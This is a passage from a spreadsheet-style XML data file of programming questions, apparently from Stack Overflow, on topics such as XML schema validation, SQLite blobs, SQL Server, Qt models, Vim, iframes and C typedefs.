    &amp;lt;xs:schema id="ROWS" xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"&amp;gt;
      &amp;lt;xs:element name="ROWS" msdata:IsDataSet="true" msdata:Locale="en-US"&amp;gt;
        &amp;lt;xs:complexType&amp;gt;
          &amp;lt;xs:choice minOccurs="0" maxOccurs="unbounded"&amp;gt;
            &amp;lt;xs:element name="ROW"&amp;gt;
              &amp;lt;xs:complexType&amp;gt;
                &amp;lt;xs:sequence&amp;gt;
                  &amp;lt;xs:element name="COL1" type="xs:decimal" minOccurs="0" /&amp;gt;
                  &amp;lt;xs:element name="COL2" type="xs:decimal" minOccurs="0" /&amp;gt;
                &amp;lt;/xs:sequence&amp;gt;
              &amp;lt;/xs:complexType&amp;gt;
            &amp;lt;/xs:element&amp;gt;
          &amp;lt;/xs:choice&amp;gt;
        &amp;lt;/xs:complexType&amp;gt;
      &amp;lt;/xs:element&amp;gt;
    &amp;lt;/xs:schema&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then a dataset.ReadXml() and Update()ing the dataset.&lt;/p&gt;
&lt;p&gt;Whenever it hits bad data I get the following exception:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.Xml.Schema.XmlSchemaValidationException
  was unhandled&lt;/p&gt;
  &lt;p&gt;Message="The 'COL1'
  element is invalid - The value 'A40'
  is invalid according to its datatype
  '&lt;a href="http://www.w3.org/2001/XMLSchema:decimal" rel="nofollow"&gt;http://www.w3.org/2001/XMLSchema:decimal&lt;/a&gt;'
  - The string 'A40' is not a valid Decimal value."&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I can think of several ways of ways of getting around the problem but they all feel like a bit of a kludge and I'd like to learn something more elegant, and improve my knowledge. Here's what I've come up with so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Pre-process the XML provided by the web service before loading into the validating XML reader, removing any bad nodes entirely.&lt;/li&gt;
&lt;li&gt;Catch the XmlSchemaValidationExceptions and try to continue from them gracefully (not sure about that one)&lt;/li&gt;
&lt;li&gt;Don't use a validating XML reader, but instead catch exceptions when loading the unvalidated xml into the dataset. (again not sure about that)&lt;/li&gt;
&lt;li&gt;have string columns in the dataset, and ignore bad data until I update it, and catch anything the database rejects.&lt;/li&gt;
&lt;li&gt;go and stand over the users with a large mallet until they learn to get it right first time (too time consuming)&lt;/li&gt;
&lt;li&gt;something else?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; The data can be bad because it comes from a application that doesn't validate the user input for COL1 - but the numbers in COL2 are calculated correctly, and COL1 should correspond with a different system. Any invalid entries should be recorded so they can be corrected.  After the data is written to the database, another system verifies that COL1 is valid, and the users will soon spot if it doesn't show correctly in the other system - they used to load it by hand anyway :) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using QSortFilterProxyModel with a tree model</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a QDirModel whose current directory is set. Then I have a QListView which is supposed to show the files in that directory. This works fine. Now I want to limit the files shown, so it only shows png files (the filename ends with .png). The problem is that using a QSortFilterProxyModel and setting the filter regexp will try to match every parent of the files as well. According to the documentation:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;For hierarchical models, the filter is
  applied recursively to all children.
  If a parent item doesn't match the
  filter, none of its children will be
  shown.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, how do I get the QSortFilterProxyModel to only filter the files in the directory, and not the directories it resides in?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the length (size) of a binary blob in sqlite</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an sqlite table that contains a BLOB file, but need to do a size/length check on the blob, how do I do that?&lt;/p&gt;
&lt;p&gt;According to some documentation I did find, using length(blob) won't work, because length() only works on texts and will stop counting after the first NULL. My empirical tests have shown this to be true.&lt;/p&gt;
&lt;p&gt;I'm using SQLite 3.4.2&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Updates:&lt;/p&gt;
&lt;p&gt;So as of SQLite 3.7.6 it appears as though the length() function returns the correct value of blobs - I checked various change-logs of sqlite, but did not see in what version this was corrected.&lt;/p&gt;
&lt;p&gt;From Sqlite 3.7.6:&lt;/p&gt;
&lt;pre&gt;
payload_id|length(payload)|length(hex(payload))/2
1807913|194|194
1807914|171|171
&lt;/pre&gt;
&lt;p&gt;The &lt;a href="http://www.sqlite.org/lang_corefunc.html"&gt;documentation&lt;/a&gt; was changed to reflect this.&lt;/p&gt;
&lt;pre&gt;
length(X)   The length(X) function returns the length of X in characters if X is
            a string, or in bytes if X is a blob. If X is NULL then length(X) is
            NULL. If X is numeric then length(X) returns the length of a string 
            representation of X.
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Detect a â€œError: Object doesn't support this property or methodâ€</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The object Iâ€™m working on is instantiated in JavaScript, but used in VBScript. In one code path, the variable &lt;code&gt;M.DOM.IPt&lt;/code&gt; is defined and has a value, in the other however it is not. I need to detect if it has been defined or not. I checked that &lt;code&gt;M.DOM&lt;/code&gt; is defined and accessable in both code paths. Every test I have tried simply results in this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Error: Object doesn't support this property or method&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have tried:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;IsEmpty(M.DOM.IPt)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;M.DOM.IPt is Nothing&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;isNull(M.DOM.IPt)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Is there any way to detect the variable isnâ€™t defined and avoid the error?&lt;/p&gt;
&lt;p&gt;Note: I can put &lt;code&gt;On Error Resume Next&lt;/code&gt; in and it will simply ignore the error, but I actually need to detect it and conditionally do something about it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can one open a PNG (image) file with VB6 into an RGB array, or R, G, B arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can one open a PNG formatted image file with VB6?  Ideally, I (that is my customer) would like to have the PNG file open and placed into seperate R(ed), G(reen) and B(lue) arrays.&lt;/p&gt;
&lt;p&gt;VB6 is not my tool of choice (for lack of knowledge) and I be thrilled if some one could point me in the right direction for a VB6 solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Share Styling Between CSS Classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;a href="http://stackoverflow.com/questions/226206/alternating-item-style"&gt;this question&lt;/a&gt;, I was given a really cool answer to alternating an image and its description between left and right, respectively.  Now I want to apply styling to both, e.g. padding-top, padding-bottom etc. How do I apply a style to both the RowStyle and AlternatingRowStyle in this scenario.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;AlternatingRowStyle CssClass="ProductAltItemStyle" /&amp;gt;   
&amp;lt;RowStyle CssClass="ProductItemStyle" /&amp;gt;
&amp;lt;Columns&amp;gt;
    &amp;lt;asp:TemplateField&amp;gt;
        &amp;lt;ItemTemplate&amp;gt;
            &amp;lt;div class="Image"&amp;gt;&amp;lt;asp:Image runat="server" ID="productImage" ImageUrl='&amp;lt;%# Eval("imageUrl") %&amp;gt;' /&amp;gt;&amp;lt;/div&amp;gt;
            &amp;lt;div class="Description"&amp;gt;&amp;lt;asp:Label runat="server" ID="lblProductDesc" Width="100%" Text='&amp;lt;%# Eval("productDesc") %&amp;gt;'&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;/div&amp;gt;
        &amp;lt;/ItemTemplate&amp;gt;
    &amp;lt;/asp:TemplateField&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it possible to execute SQL commands and send MSMQ messages in a TransactionScope?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm investigating using MSMQ for my team's new project but I need to know if I can send MSMQ messages and execute SQL commands within a System.Transactions.TransactionScope and have them commit or rollback together. I can't find a reliable source online that says "yes" with code examples. &lt;/p&gt;
&lt;p&gt;I need to send some messages to a single queue and insert some records in a single database, but I need to to succeed or fail together.&lt;/p&gt;
&lt;p&gt;EDIT: I was not able to actually verify whether this works or not in my testing (I was pulled off this task quickly) but all the documentation states that TransactionScope does capture MSMQ messages and SQL commands in the same instance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>An example for using DBMS_AQ.POST and explanation of its utility</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The DBMS_AQ package has a method called POST. &lt;/p&gt;
&lt;p&gt;The documentation says,&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;This procedure posts to a list of
  anonymous subscriptions, allowing all
  clients who are registered for the
  subscriptions to get notifications of
  persistent messages. This feature is
  not supported with buffered messages.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;This call provides a best-effort
  guarantee. A notification goes to
  registered clients at most once. This
  call is primarily used for lightweight
  notification. If an application needs
  more rigid guarantees, then it can
  enqueue to a queue.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I understand all of the words but I do not see a purpose for non-guaranteed messaging. I queue something because I need it to get somewhere. Maybe it's just that my business doesn't have a use-case for this. I'd to know what use-cases you have for such a technology.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VIM visual mode: highlight last 2 chars in each line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like Vim's visual mode. &lt;kbd&gt;v&lt;/kbd&gt; for highlight/select chars or lines, &lt;kbd&gt;Ctrl&lt;/kbd&gt;&lt;kbd&gt;v&lt;/kbd&gt; for rectangle highlighting, as far as I know (I am a beginner). Is there any way to use visual mode to highlight last two chars, for example, on each line for some selected lines? The selected lines are in different length. Basically, I would like to find a quick way to remove the last two chars for some selected lines. Not sure I can use visual mode to highlight irregular area.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove a field from SQLServer2005 table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER TABLE My.Table DROP MyField
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and got this error:&lt;/p&gt;
&lt;p&gt;-MyField is not a constraint.&lt;/p&gt;
&lt;p&gt;-Could not drop constraint. See previous errors.&lt;/p&gt;
&lt;p&gt;There is just one row of data in the table and the field was just added.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
Just to follow up, the sql was missing COLUMN indeed.
Now I get even more seriously looking errors though:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The object 'some_object__somenumbers' is dependent on column 'MyField'&lt;/li&gt;
&lt;li&gt;ALTER TABLE DROP COLUMN MyField failed because one or more objects access this column.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER TABLE TableName DROP Constraint ConstraintName
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;worked, after that I was able to use the previous code to remove the column. Credit goes to both of you, thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find the ip address of a remote object in .net remoting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a client-server application that uses .net remoting. The clients are in a LAN and i do not know their location in advance.&lt;/p&gt;
&lt;p&gt;Sometimes we do file transfers and as an optimization I want to determine if a client is in fact on the same machine as the server (it is quite possible). In this case, I only need to do a File.Copy. &lt;/p&gt;
&lt;p&gt;Let's say that a client calls the remote method: &lt;/p&gt;
&lt;p&gt;RemoteFile server.GetFile(string path);&lt;/p&gt;
&lt;p&gt;how can I determine if the client (the requester) is on the same machine?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Invoking JavaScript code in an iframe from the parent page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically, I have an iframe embedded in a page and the iframe has some &lt;a href="http://en.wikipedia.org/wiki/JavaScript"&gt;JavaScript&lt;/a&gt; routines I need to invoke from the parent page.&lt;/p&gt;
&lt;p&gt;Now the opposite is quite simple as you only need to call &lt;code&gt;parent.functionName()&lt;/code&gt;, but unfortunately I need exactly the opposite of that.&lt;/p&gt;
&lt;p&gt;Please note that my problem is not changing the source &lt;a href="http://en.wikipedia.org/wiki/Uniform_Resource_Locator"&gt;URL&lt;/a&gt; of the iframe, but invoking a function defined in the iframe.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I run Visual Studio 2008 x86 on Windows Vista x64?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to run the 32-bit version of Visual Studio 2008 Professional on a Windows Vista 64-bit system? &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Are there any known caveats that I would need to be aware of?&lt;/li&gt;
&lt;li&gt;Would have to install the x64 version of the .NET Framework?&lt;/li&gt;
&lt;li&gt;Would there be any issues on building software targeted for x86?&lt;/li&gt;
&lt;li&gt;Would there be any (justifiable) arguments for getting the x64 version of VS2008 instead of reusing the current x86 license?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quite tempted on getting a x64 Vista rig to be able to take advantage of more RAM :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to shrink a SQL Server Log file with Mirroring enabled?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several databases for my applications that use SQL Server 2005 mirroring to keep a nice copy of the data somewhere else.  Works like a charm,  however, the log file just seems to be growing and growing, one is at 15GB for a 3GB database.  &lt;/p&gt;
&lt;p&gt;Normally, I can just shrink it - however an error pops up that this specifically cannot be done.  But, it seems eventually if unchecked would just expand to use all the space on the drive.&lt;/p&gt;
&lt;p&gt;I see that I can set a maximum file size for the log file, is that the answer here? Will the log just roll when it hits the max, or will the DB just stop functioning?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add columns to an Access (Jet) table from .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our app (already deployed) is using an Access/Jet database. The upcoming version of our software requires some additional columns in one of the tables. I need to first check if these columns exist, and then add them if they don't.&lt;/p&gt;
&lt;p&gt;Can someone provide a quick code sample, link, or nudge in the right direction?&lt;/p&gt;
&lt;p&gt;(I'm using c#, but a VB.NET sample would be fine, too).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why use a web service with Linq to SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone tell me what the need/advantage is to using a web service with an asp.net gui and using Linq to SQL? The web service layer seems unnecessary. Linq to SQL is completely new to me and I am researching as I am setting up a new project. Does anyone have any experience with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to separate long running (e.g. stress tests) out so they're not run by default in Maven 2?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've had an ongoing need here that I can't figure out how to address using the stock Maven 2 tools and documentation.&lt;/p&gt;
&lt;p&gt;Some of our developers have some very long running JUnit tests (usually stress tests) that under no circumstances should be run as a regular part of the build process / nightly build.&lt;/p&gt;
&lt;p&gt;Of course we can use the surefire plugin's exclusion mechanism and just punt them from the build, but ideally we'd love something that would allow the developer to run them at will through Maven 2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Odd issue with textbox and ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This code was working properly before, basically I have a master page that has a single text box for searching, I named it &lt;strong&gt;&lt;code&gt;searchBox&lt;/code&gt;&lt;/strong&gt;.  I have a method to pull the content of &lt;strong&gt;&lt;code&gt;searchBox&lt;/code&gt;&lt;/strong&gt; on form submit and set it to a variable &lt;strong&gt;&lt;code&gt;userQuery&lt;/code&gt;&lt;/strong&gt;.  Here is the method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Function searchString(ByVal oTextBoxName As String) As String
    If Master IsNot Nothing Then
        Dim txtBoxSrc As New TextBox
        txtBoxSrc = CType(Master.FindControl(oTextBoxName), TextBox)
        If txtBoxSrc IsNot Nothing Then
            Return txtBoxSrc.Text
        End If
    End If
    Return Nothing
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The results are displayed on &lt;strong&gt;&lt;code&gt;search.aspx&lt;/code&gt;&lt;/strong&gt;. Now, however, if &lt;strong&gt;&lt;code&gt;searchBox&lt;/code&gt;&lt;/strong&gt; is filled and submitted on a page other than &lt;strong&gt;&lt;code&gt;search.aspx&lt;/code&gt;&lt;/strong&gt;, the contents of the text box are not passed through. The form is very simple, just:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;asp:TextBox ID="searchBox" runat="server"&amp;gt;&amp;lt;/asp:TextBox&amp;gt;&lt;br /&gt;
&amp;lt;asp:Button ID="searchbutton" runat="server" Text="search" UseSubmitBehavior="True" PostBackUrl="~/search.aspx" CssClass="searchBtn" /&amp;gt;&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you check and see if a propel object has an i18n record?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using symfony and propel, and I'm trying to invoke a specific culture on an object and output some fields of that object to the screen in that specific culture. However, if the object's mapped database record doesn't have those fields in that specific culture, I would like it to default to the base culture (in this case, en_US)&lt;/p&gt;
&lt;p&gt;I'm doing it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$currentLesson = $currentLesson-&amp;gt;getCurrentLessonsI18n($lessonCulture);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I output such as this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$currentLesson-&amp;gt;getTitle();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It outputs an empty string if there is no culture record for it. My question is, is there a way to make an object default to a specific culuture if the one I specify isn't available, or is there a method to see if  a specific object has a culture i18n record?&lt;/p&gt;
&lt;p&gt;something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if($currentLesson-&amp;gt;cultureExists($lessonCulture) $currentLesson = $currentLesson-&amp;gt;getCurrentLessonsI18n($lessonCulture);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sfConfig::setPropelDefaultCulture("en_US");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Displaying unit test results in VS 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a rookie was using the Visual Studio 2008 built-in Unit Testing components, what would be the best way to record or display your results in a unit test?&lt;/p&gt;
&lt;p&gt;I want to test my service method when it returns a System.GUID and an empty System.GUID&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[TestMethod]
public void GetGUID()
{
   MyWcfServiceService.MyWcfServiceClient proxy = new MyWcfServiceService.MyWcfServiceClient();
   string name = "HasGuid";
   System.GUID guid = proxy.GetGUID(name);
}
[TestMethod]
public void GetEmptyGUID()
{
    MyWcfServiceService.MyWcfServiceClient proxy = new MyWcfServiceService.MyWcfServiceClient();
   string name = "HasEmptyGuid";
   System.GUID guid = proxy.GetGUID(name);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Which SQL Read TRANSACTION ISOLATION LEVEL do I want for long running insert?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a long running insert transaction that inserts data into several related tables.  &lt;/p&gt;
&lt;p&gt;When this insert is running, I cannot perform a select * from MainTable.  The select just spins its wheels until the insert is done.  &lt;/p&gt;
&lt;p&gt;I will be performing several of these inserts at the same/overlapping time.  To check that the information is not inserted twice, I query the MainTable first to see if an entry is there and that its processed bit is not set.  &lt;/p&gt;
&lt;p&gt;During the insert transaction, it flips the MainTable processed bit for that row.&lt;/p&gt;
&lt;p&gt;So I need to be able to read the table and also be able to tell if the specific row is currently being updated.&lt;/p&gt;
&lt;p&gt;Any ideas on how to set this up in Microsoft SQL 2005?  I am looking through the &lt;a href="http://msdn.microsoft.com/en-us/library/ms173763.aspx" rel="nofollow"&gt;SET TRANSACTION ISOLATION LEVEL&lt;/a&gt; documentation.&lt;/p&gt;
&lt;p&gt;Thank you,&lt;br /&gt;
Keith&lt;/p&gt;
&lt;p&gt;&lt;b&gt;EDIT:&lt;/b&gt;  I do not think that the same insert batch will happen at the same time.  These are binary files that are being processed and their data inserted into the database.  I check that the file has not been processed before I parse and insert the data.  When I do the check, if the file has not been seen before I do a quick insert into the MainTable with the processed bit set false.  &lt;/p&gt;
&lt;p&gt;Is there a way to lock the row being updated instead of the entire table?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross Resolution Applications in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are developing a small in-house application that will run on monitor having multi resolutions. Now we want that the application should adjust itself and remain consistent over all monitors.&lt;/p&gt;
&lt;p&gt;I came from a Java background too where we used different layouts to accomplish the task. I experimented in .NET with different layouts like UniGrid (which provide the consistency but very restrictive), Grid, etc. but failed in the required task. &lt;/p&gt;
&lt;p&gt;What are some possible layout model or some other solution?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I think if we can specify percentage width or height as we do in CSS/HTML then we can adopt this cross-resolution policy. I found Infergistics have such controls, but can this can be achieved via default controls?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;P.S.: I am actually trying in WPF (preferably WPF native application).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code Signing Certificate Options</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been assigned the task of buying a digital certificate for my company to sign our code. We develop applications in the Microsoft space - mostly WPF or Web Based.&lt;/p&gt;
&lt;p&gt;I've investigated options and found Comodo to be well priced and responsive, and we're ready to go ahead and purchase a cert through them.. however in the signup form there are various private key options that I'm not too sure about, namely:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;CSP&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Microsoft Base Cryptographic Provider&lt;/li&gt;
&lt;li&gt;Microsoft Base Smart Card Crypto Provider&lt;/li&gt;
&lt;li&gt;Microsoft Enhanced Cryptographic Provider v1.0&lt;/li&gt;
&lt;li&gt;Microsoft Software Cryptographic Provider&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Key Size&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;1024&lt;/li&gt;
&lt;li&gt;2048&lt;/li&gt;
&lt;li&gt;4096&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Exportable?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Yes / No&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;User Protected?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Yes / No&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Just wondering what all of this means, and what the best options are for our requirements?  Any advice/ suggestions would be appreciated&lt;/p&gt;
&lt;p&gt;thanks heaps
Greg&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stored procedures or inline queries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First of all there is a &lt;a href="http://stackoverflow.com/questions/59880/are-stored-procedures-more-efficient-in-general-than-inline-statements-on-moder"&gt;partial question&lt;/a&gt; regarding this, but it is not exactly what I'm asking, so, bear with me and go for it.&lt;/p&gt;
&lt;p&gt;My question is, after looking at what &lt;a href="http://subsonicproject.com/" rel="nofollow"&gt;SubSonic&lt;/a&gt; does and the excellent videos from Rob Connery I need to ask: &lt;strong&gt;Shall we use a tool like this and do Inline queries or&lt;/strong&gt; shall we do the queries &lt;strong&gt;using&lt;/strong&gt; a call to the &lt;strong&gt;stored procedure?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I don't want to minimize any work from Rob (which I think it's amazing) but I just want your opinion on this cause I need to start a new project and I'm in the middle of the line; shall I use SubSonic (or other like tool, like NHibernate) or I just continue my method that is always call a stored procedure even if it's a simple as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select this, that from myTable where myStuff = StackOverflow;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>using Reflector.Invoke Method on functions wih optional parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use reflector.InvokeMethod to invoke a function with an optional parameter.
The function looks like this: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Function DoSomeStuff(ByVal blah1 as string, ByVal blah2 as string, Optional ByVal blah3 as string = "45") as boolean
'stuff
end function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I'm Invoking it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim result As Boolean = Reflector.InvokeMethod(AccessModifier.private,obj_of_Class, "DoSomeStuff", Param1, Param2, Param3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works fine, other than when I don't pass the third (optional) parameter, it dosn't hit the function.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim result As Boolean = Reflector.InvokeMethod(AccessModifier.private,obj_of_Class, "DoSomeStuff", Param1, Param2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way I can use Reflector.invokeMethod to call this function without passing the optional parameter? or another way to achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When is SqlConnection.RetrieveStatistics() useful?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the problems that calling this method can help with?&lt;br /&gt;
Do you ever use it in debugging you data access?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between file and record in OS's view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In terms of general operating system concepts, what is the difference between a file and a record?&lt;/p&gt;
&lt;p&gt;How the OS will manage them? I know what a file is and what a record is but how it is distinguished in an 
OS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I delete my browser cookies using javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I delete the session information from my browser by using javascript?  Is it possible to do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why should we typedef a struct so often in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have seen many programs consisting of structures like the one below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef struct 
{
    int i;
    char k;
} elem;
elem user;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why is it needed so often? Any specific reason or applicable area?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it best practice to achieve recursion via a partial?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the need to display a nested set structure in HTML. I am doing it with the following partial:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;lt;%= ' id="tree"' if depth == 0 %&amp;gt;&amp;gt;
&amp;lt;% items.each do |item| %&amp;gt;
  &amp;lt;li id="node_&amp;lt;%= item.id %&amp;gt;"&amp;gt;&amp;lt;a&amp;gt;&amp;lt;%= item.name %&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;% if item.has_children? %&amp;gt;
    &amp;lt;%= render :partial =&amp;gt; 'tree_level', :locals =&amp;gt; {:items =&amp;gt; item.children, :depth =&amp;gt; depth + 1} %&amp;gt;
  &amp;lt;% end %&amp;gt;
  &amp;lt;/li&amp;gt;
&amp;lt;% end %&amp;gt;   
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this the best place to have the code? I "feel" like there should be a &lt;code&gt;to_html&lt;/code&gt; method on the object which dumps the entire tree structure for me, though this works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Syntax colouring using Swing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to have something like a JTextArea which will color some keywords based on some mappings I have ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is there a difference between the encoding of the Windows Command Prompt vs. a batch file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, suppose I have a batch file called &lt;code&gt;'test.cmd'&lt;/code&gt; and it simply contains:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo %1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can call this directly from the command prompt with &lt;code&gt;'test.cmd someÂ¬arg'&lt;/code&gt; and the result is that the string &lt;code&gt;'someÂ¬arg'&lt;/code&gt; is printed.&lt;/p&gt;
&lt;p&gt;However if I place that same call in a second batch file, called &lt;code&gt;'tester.cmd'&lt;/code&gt; for the sake of argument, and I call this from the command prompt the result is that the string &lt;code&gt;'some%arg'&lt;/code&gt; is printed.&lt;/p&gt;
&lt;p&gt;What is it that messes up the encoding and how do I get around it?  I am sure I've fixed this before, but I can't remember how...&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to format if statement with multiple conditions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you want to some code to execute based on two or more conditions which is the best way to format that if statement ?&lt;/p&gt;
&lt;p&gt;first example:-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(ConditionOne &amp;amp;&amp;amp; ConditionTwo &amp;amp;&amp;amp; ConditionThree)
{
   Code to execute
}
&lt;/code&gt;&lt;/pre&gt;
